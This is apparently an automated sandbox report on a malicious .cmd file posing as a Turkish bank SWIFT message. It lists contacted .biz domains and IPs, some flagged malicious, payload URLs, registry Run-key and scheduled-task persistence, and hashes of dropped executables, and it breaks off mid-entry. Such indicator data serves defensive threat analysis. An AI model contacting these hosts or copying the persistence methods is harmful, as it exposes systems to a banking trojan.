                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                                                                                                  truefalse
                                                                                                                    saytjshyf.biz
                                                                                                                    44.221.84.105
                                                                                                                    truefalse
                                                                                                                      rrqafepng.biz
                                                                                                                      47.129.31.212
                                                                                                                      truefalse
                                                                                                                        aatcwo.biz
                                                                                                                        47.129.31.212
                                                                                                                        truefalse
                                                                                                                          uphca.biz
                                                                                                                          44.221.84.105
                                                                                                                          truefalse
                                                                                                                            htwqzczce.biz
                                                                                                                            172.234.222.143
                                                                                                                            truefalse
                                                                                                                              xyrgy.biz
                                                                                                                              18.208.156.248
                                                                                                                              truetrue
                                                                                                                                banwyw.biz
                                                                                                                                44.221.84.105
                                                                                                                                truefalse
                                                                                                                                  myups.biz
                                                                                                                                  165.160.15.20
                                                                                                                                  truefalse
                                                                                                                                    pwlqfu.biz
                                                                                                                                    34.246.200.160
                                                                                                                                    truefalse
                                                                                                                                      zyiexezl.biz
                                                                                                                                      18.208.156.248
                                                                                                                                      truetrue
                                                                                                                                        hlzfuyy.biz
                                                                                                                                        34.211.97.45
                                                                                                                                        truetrue
                                                                                                                                          ssbzmoy.biz
                                                                                                                                          18.141.10.107
                                                                                                                                          truefalse
                                                                                                                                            knjghuig.biz
                                                                                                                                            18.141.10.107
                                                                                                                                            truefalse
                                                                                                                                              yunalwv.biz
                                                                                                                                              208.100.26.245
                                                                                                                                              truefalse
                                                                                                                                                brsua.biz
                                                                                                                                                3.254.94.185
                                                                                                                                                truefalse
                                                                                                                                                  mgmsclkyu.biz
                                                                                                                                                  34.246.200.160
                                                                                                                                                  truefalse
                                                                                                                                                    cpclnad.biz
                                                                                                                                                    44.221.84.105
                                                                                                                                                    truefalse
                                                                                                                                                      ptrim.biz
                                                                                                                                                      18.141.10.107
                                                                                                                                                      truefalse
                                                                                                                                                        ihcnogskt.biz
                                                                                                                                                        35.164.78.200
                                                                                                                                                        truefalse
                                                                                                                                                          qpnczch.biz
                                                                                                                                                          18.246.231.120
                                                                                                                                                          truefalse
                                                                                                                                                            mnjmhp.biz
                                                                                                                                                            47.129.31.212
                                                                                                                                                            truefalse
                                                                                                                                                              acwjcqqv.biz
                                                                                                                                                              18.141.10.107
                                                                                                                                                              truefalse
                                                                                                                                                                zrlssa.biz
                                                                                                                                                                44.221.84.105
                                                                                                                                                                truefalse
                                                                                                                                                                  pywolwnvd.biz
                                                                                                                                                                  54.244.188.177
                                                                                                                                                                  truetrue
                                                                                                                                                                    mjheo.biz
                                                                                                                                                                    44.221.84.105
                                                                                                                                                                    truefalse
                                                                                                                                                                      lrxdmhrr.biz
                                                                                                                                                                      54.244.188.177
                                                                                                                                                                      truetrue
                                                                                                                                                                        vrrazpdh.biz
                                                                                                                                                                        34.211.97.45
                                                                                                                                                                        truetrue
                                                                                                                                                                          cikivjto.biz
                                                                                                                                                                          18.246.231.120
                                                                                                                                                                          truefalse
                                                                                                                                                                            fgajqjyhr.biz
                                                                                                                                                                            34.211.97.45
                                                                                                                                                                            truetrue
                                                                                                                                                                              hehckyov.biz
                                                                                                                                                                              44.221.84.105
                                                                                                                                                                              truefalse
                                                                                                                                                                                kkqypycm.biz
                                                                                                                                                                                18.141.10.107
                                                                                                                                                                                truefalse
                                                                                                                                                                                  bzkysubds.biz
                                                                                                                                                                                  3.94.10.34
                                                                                                                                                                                  truefalse
                                                                                                                                                                                    xlfhhhm.biz
                                                                                                                                                                                    47.129.31.212
                                                                                                                                                                                    truefalse
                                                                                                                                                                                      warkcdu.biz
                                                                                                                                                                                      18.141.10.107
                                                                                                                                                                                      truefalse
                                                                                                                                                                                        npukfztj.biz
                                                                                                                                                                                        44.221.84.105
                                                                                                                                                                                        truefalse
                                                                                                                                                                                          dwrqljrr.biz
                                                                                                                                                                                          54.244.188.177
                                                                                                                                                                                          truetrue
                                                                                                                                                                                            gytujflc.biz
                                                                                                                                                                                            208.100.26.245
                                                                                                                                                                                            truefalse
                                                                                                                                                                                              gvijgjwkh.biz
                                                                                                                                                                                              3.94.10.34
                                                                                                                                                                                              truefalse
                                                                                                                                                                                                sewlqwcd.biz
                                                                                                                                                                                                44.221.84.105
                                                                                                                                                                                                truefalse
                                                                                                                                                                                                  vnvbt.biz
                                                                                                                                                                                                  18.246.231.120
                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                    nwdnxrd.biz
                                                                                                                                                                                                    54.244.188.177
                                                                                                                                                                                                    truetrue
                                                                                                                                                                                                      qvuhsaqa.biz
                                                                                                                                                                                                      54.244.188.177
                                                                                                                                                                                                      truetrue
                                                                                                                                                                                                        iuzpxe.biz
                                                                                                                                                                                                        13.251.16.150
                                                                                                                                                                                                        truefalse
                                                                                                                                                                                                          nqwjmb.biz
                                                                                                                                                                                                          35.164.78.200
                                                                                                                                                                                                          truefalse
                                                                                                                                                                                                            wllvnzb.biz
                                                                                                                                                                                                            18.141.10.107
                                                                                                                                                                                                            truefalse
                                                                                                                                                                                                              kvbjaur.biz
                                                                                                                                                                                                              54.244.188.177
                                                                                                                                                                                                              truetrue
                                                                                                                                                                                                                napws.biz
                                                                                                                                                                                                                35.164.78.200
                                                                                                                                                                                                                truefalse
                                                                                                                                                                                                                  cvgrf.biz
                                                                                                                                                                                                                  54.244.188.177
                                                                                                                                                                                                                  truetrue
                                                                                                                                                                                                                    lpuegx.biz
                                                                                                                                                                                                                    82.112.184.197
                                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                                      vcddkls.biz
                                                                                                                                                                                                                      18.141.10.107
                                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                                        wluwplyh.biz
                                                                                                                                                                                                                        18.141.10.107
                                                                                                                                                                                                                        truefalse
                                                                                                                                                                                                                          vyome.biz
                                                                                                                                                                                                                          18.246.231.120
                                                                                                                                                                                                                          truefalse
                                                                                                                                                                                                                            dlynankz.biz
                                                                                                                                                                                                                            85.214.228.140
                                                                                                                                                                                                                            truefalse
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                                                                                                                                                                                                                                                        http://172.234.222.143/)Native_neworigin.exe, 0000001B.00000003.1551625098.000000000522A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1552020145.0000000005247000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                          http://54.244.188.177/gcjwtnoNative_neworigin.exe, 0000001B.00000003.1551625098.000000000522A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1552020145.0000000005247000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                            http://x1.c.lencr.org/0Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003218000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.0000000005282000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000063E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                              http://x1.i.lencr.org/0Native_neworigin.exe, 0000001B.00000002.1722177417.0000000003218000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.000000000522C000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1778079726.0000000005282000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000063E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                http://44.221.84.105:80/ryyevidfyalg.exe, 0000001D.00000003.2801483530.0000000000574000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                  https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    https://gxe0.com/AnyDesk.PIF, 0000000F.00000002.1438483669.0000000000797000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                                                                                                                                                                                                                      104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                      api.ipify.orgUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                                                                                                                                                                                                                      43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                      18.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      ssbzmoy.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557469
Start date and time: 2024-11-18 09:56:14 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 15m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 45
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd
Detection: MAL
Classification: mal100.spre.bank.troj.spyw.evad.winCMD@61/169@305/22
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 60
• Number of non-executed functions: 209
Cookbook Comments:
• Found application associated with file extension: .cmd
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SIHClient.exe, Sgrmuserer.exe, svchost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd
Time      Type             Description
03:57:13  API Interceptor  2x Sleep call for process: AnyDesk.PIF modified
03:57:28  API Interceptor  126x Sleep call for process: Native_neworigin.exe modified
03:57:31  API Interceptor  150x Sleep call for process: alg.exe modified
03:57:31  API Interceptor  25x Sleep call for process: powershell.exe modified
03:57:41  API Interceptor  2x Sleep call for process: Juqmtmya.PIF modified
03:57:42  API Interceptor  12x Sleep call for process: aymtmquJ.pif modified
09:57:30  Task Scheduler   Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
09:57:30  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
09:57:39  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
09:57:48  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                                                                                                                                                                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1353216
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.324381225777409
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:EC4VQjGARQNhiaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:EOCAR0iasqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:8B7E968F4FA1CCECFCFA77ADFD9BE327
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A8BF070D26965CE498B3D75DDB473BEE04C75A35
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:6CED0EA7DC864AF34707B2A72D68F85C4D0DF9199F13E081968E913BA8A0EC28
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:3DAAAA86468F3B73A033963520A1F6EC0F3283A3711F19069D8AE4440688B2A16339AD5DD87C2DFA0FEB9CF6E4B34368DC5D7D4CC0FF6A2FD84F845DA19139FF
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1294848
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.282701081652174
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:fNUpaKghhXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fCMKgTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:8EDB9C650574E2608871AF5CADA014B8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:382A56CF060B51CBED87EDF1A0CC1739FF1943C7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:C5A4865966BEBD9C0B471060F210BA05FD23322DBC62EA9C5DD05606F078D269
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:B5E380843116367BEC236D94A8B4CDF6F8A6ABFD9B9BA41C21D3AAD9C58AB85ECCA5561E0B04802F77E2F181209D9B9FFFB896B14323E0A3CA756CE5C05BB436
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1314304
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.274138199388269
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:hMEhwdbTWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fKdHWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:39EB775582A1C452482D310C0E5A263E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:1BB3F269F6E57F1BE11792E846D0FF5FA4E3040F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:5085FC2C0149884244106B48074F9D7BF774F76646DFCEC56C064BC57C6806BA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:A29BD8010D5F7A6F765B177187F868F1130372DF132F385F88649F110D0B3BC9841D626D5EB2259ED4B09D3AF76C6B7C232BDE8CCED801909D13634B427EE269
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2203136
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.647033100106745
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:+K0eqkSR7Xgo4TiRPnLWvJSDmg27RnWGj:+K0pR7Xn4TiRCvJSD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:C450C0825B80F66BBC1D2BBB03CA06EE
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:C57709F40592718A6A9810C9D768AEB1CD934480
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:ACBE3DEEC4534614BA46D83600590849283B223F93C8FAA63B0FB0BE6F9EC6B2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:2A4952F32743A56381024F0E22D38B06A1FC6EE9C061032EF48976945F866AD6C7DB0E35965F245375572CC3B3CD3FA21E49E27C8F59FBABCAF527B8C9DE4F80
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2369024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.565058069750008
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:mfYP1JsEDkSR7Xgo4TiRPnLWvJSDmg27RnWGj:mYPBR7Xn4TiRCvJSD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:84E2702060F23E180809414DBAF12898
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A1C8C3A162F74A7AC4DE1A4BA65C654FA99ACC5A
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:E1D2A2350EB61A649E1B3725AB445F5830C7F5787076F9276A432DE564B4D0F8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:A27B7ABD01F29ABF38144F3CEC28A49F9886EB778F77511DDF64A0592B1B2B79BC24E13F8730ECEE612A00485D218F0C6B64900BFFA41828B9C3004DD6A0663E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1245184
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.12355652474732
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:W62SYUcknn8Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:rYUckn8sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:6CDF84AC315BBA13D224DBB4DCC9D8CD
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:5B8261065EC28F5205FDF289D073B90E627306DA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:B5A28F699034446DF7B04DF145BBCDE71F306019671514192399B89335236A29
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:521B28BD6F82022913F66F744D32AE17AB895909441177D6CCC507F5B6175D6D10EAB8FC41BE0A1720BDBAFAC2C02CD7544CD23E008CD082FDF4A3824430CC36
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1640448
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.166680568339516
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:h+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSGDmg27RnWGj:LSktbpoD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:08F095DC6399A5A3BD7A4ED3DCDD615E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:BBF24D443B4F85691189A7B505C6B61E68191E2F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:62434B6F22FBF7F3988D97D76E162E04A17B696E3D07BCFDFF5C9A94743F7E97
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:6940FF4A94FCE153636E89872E9A85CB87F54FC18416D0309F1844131E05497D32922DC9DD39AB8158684D0D7C05D916E8BF17C0858BAEAC3C976B7B043A4D4C
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2953728
Entropy (8bit): 7.094635585874868
Encrypted: false
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1485824
Entropy (8bit): 5.496392003574737
Encrypted: false
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Users\Public\Libraries\aymtmquJ.pif
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1290240
Entropy (8bit): 5.277749247988975
Encrypted: false
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1644544
Entropy (8bit): 5.694803437049375
Encrypted: false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:g0vHyeLj8trn3wsMsqjnhMgeiCl7G0nehbGZpbD:htj4rgs4Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:173F030CF90169729A3FCCB54FACFAF8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:FBB8F75E64CF4028C2409BC9365BE33FC09F58FE
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:C93E07A2ED9F80CF44396C04EA0CA4BA556588A80880A6BDB926E1881A70A963
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:C6DBD7286A54A437599393A5E3CF99B2C6ED4156C00AE301112EA9C7F5B00152ACA51F5642F84B7692E7EC092FEF08C9CCC6152B81A8AA4973FD65015FFFE5CF
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown

Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1781760
Entropy (8bit):7.279664711717398
Encrypted:false
SSDEEP:24576:7oMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZZsqjnhMgeiCl7G0nehbGZpv:y4i0wGJra0uAUfkVy7/ZdDmg27RnWGj
MD5:A7A0AFAD35A4F33D1A61A2F76E1BBE4C
SHA1:FEC852519CF370E4BF4D2848DD5D4592397E7E45
SHA-256:678653AA007CBC0145679B4922D1F8A2A63429FCE67B29F6891876B647C42E7F
SHA-512:A3592B5735C90D8E61F417F7A4F4922411AEAD183103820692579829EFD7F2CD22994D14C247960366542089C363572F5A3382B4E3E6971B24A66E9185AA9969
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown

Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1318400
Entropy (8bit):7.44876566551728
Encrypted:false
SSDEEP:24576:SeR0gB6axoCf0R6RLQRF/TzJqe58BimSsqjnhMgeiCl7G0nehbGZpbD:ugHxmR6uBTzge5MimWDmg27RnWGj
MD5:1AA8A5003F44B5BEACEAFE21D1BB3F2C
SHA1:F00A0BE2AF9C795A917827C97305A181B21358AE
SHA-256:640B946367A8E97C3C74B7D9AEB6E665A7C1A6991AC66D5A72090353271C23B5
SHA-512:EBE1AA6C8A0D5011D1C65FEEF8DDEA9E8DF72230331719AB41E3B43F44567A45C9CAC837C2C02B724830FA6CC879968B1D3151A79BB292909234772AAB9644D6
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown

Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1375232
Entropy (8bit):5.446064863875644
Encrypted:false
SSDEEP:12288:2nEbH0j4x7R6SvyCMcXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:2kwOtO7csqjnhMgeiCl7G0nehbGZpbD
MD5:D5E09BBE448C15FD948E4B0DE09BB6C6
SHA1:A9B891916ACE725336CFF921F84173DA5FD32B8C
SHA-256:3DF4E595B5D17DCE8DCF63F19126ECD8F590235107E7BF564C84CD5A60E7CA5B
SHA-512:8D088ABA721FCA93A23059E31BD5823B2AE7F81F00B464A8B98CFA4D9930F5BDD985C5B2DD8086CA115CD9992AAC27CF383C660E4EB7C526FD6A5BD920DBB7C2
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
